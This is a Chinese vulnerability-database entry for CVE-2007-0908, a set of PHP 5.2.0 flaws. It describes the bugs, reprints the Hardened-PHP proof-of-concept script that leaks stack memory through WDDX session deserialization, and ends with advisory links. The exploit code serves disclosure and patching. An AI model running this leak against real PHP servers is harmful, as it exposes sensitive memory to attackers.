PHP 5.2.0及之前版本多个安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112352 漏洞类型 输入验证
发布时间 2007-03-04 更新时间 2007-07-22
CVE编号 CVE-2007-0908 CNNVD-ID CNNVD-200702-269
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3414
https://www.securityfocus.com/bid/22806
https://cxsecurity.com/issue/WLB-2007030019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-269
|漏洞详情
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。PHP的实现上存在多个安全漏洞,本地或远程攻击者可以利用这些漏洞获取敏感信息或执行任意代码。相关的漏洞有:1)用户可通过会话扩展绕过safe_mode和open_basedir保护机制;2)会话扩展中的溢出可能导致栈破坏;3)zip、imap和sqlite扩展中存在栈溢出;4)流过滤器中存在缓冲区溢出;5)str_replace()函数中存在溢出;6)wddx扩展中的漏洞可能导致泄漏敏感信息;7)64位系统上的*print()函数存在格式串错误;8)mail()、ibase_add_user()、ibase_delete_user()和ibase_modify_user()函数中存在缓冲区溢出;9)odbc_result_all()函数中存在格式串错误。
|漏洞EXP
<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //       PHP WDDX Session Deserialization Stack Information Leak      //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  if (!extension_loaded("wddx")) {
    die("wddx extension needed\n");
  }

  ini_set("session.serialize_handler", "wddx");
  
  session_start();
  
  session_decode("<wddxPacket version='1.0'><header/><data><struct><var name='".str_repeat("A",8192)."'><string>A</string></var><var name='1'><string>1</string></var></struct></data></wddxPacket>");    

  $keys = array_keys($_SESSION);
  $stackdump = $keys[1];
  
  echo "Stackdump\n---------\n\n";
  
  for ($b=0; $b<strlen($stackdump); $b+=16) {
    printf("%08x: ", $b);
    for ($i=0; $i<16; $i++) {
      printf ("%02x ", ord($stackdump[$b+$i]));
    }
    for ($i=0; $i<16; $i++) {
      $c = ord($stackdump[$b+$i]);
      if ($c > 127 || $c < 32) {
        $c = ord(".");
      }
      printf ("%c", $c);
    }
    printf("\n");
  }
?>

# milw0rm.com [2007-03-04]
|受影响的产品
Ubuntu Ubuntu Linux 5.10 sparc Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu L
|参考资料

来源:BID
名称:22496
链接:http://www.securityfocus.com/bid/22496
来源:VUPEN
名称:ADV-2007-0546
链接:http://www.frsirt.com/english/advisories/2007/0546
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-1088
来源:XF
名称:php-wddx-information-disclosure(32493)
链接:http://xforce.iss.net/xforce/xfdb/32493
来源:DEBIAN
名称:DSA-1264
链接:http://www.us.debian.org/security/2007/dsa-1264
来源:UBUNTU
名称:USN-424-2
链接:http://www.ubuntu.com/usn/usn-424-2
来源:UBUNTU
名称:USN-424-1
链接:http://www.ubuntu.com/usn/usn-424-1
来源:TRUSTIX
名称:2007-0009
链接:http://www.trustix.org/errata/2007/0009/
来源:SECTRACK
名称:1017671
链接:http://www.securitytracker.com/id?1017671
来源:BID
名称:22806
链接:http://www.securityfocus.com/bid/22806
来源:BUGTRAQ
名称:20070227rPSA-2007-0043-1phpphp-mysqlphp-pgsql
链接:http://www.securityfocus.com/archive/1/archive/1/461462/100/0/threaded
来源:REDHAT
名称:RHSA-2007:0088
链接:http://www.redhat.com/support/errata/RHSA-2007-0088.html
来源:REDHAT
名称:RHSA-2007:0082
链接:http://www.redhat.com/support/errata/RHSA-2007-0082.html
来源:RE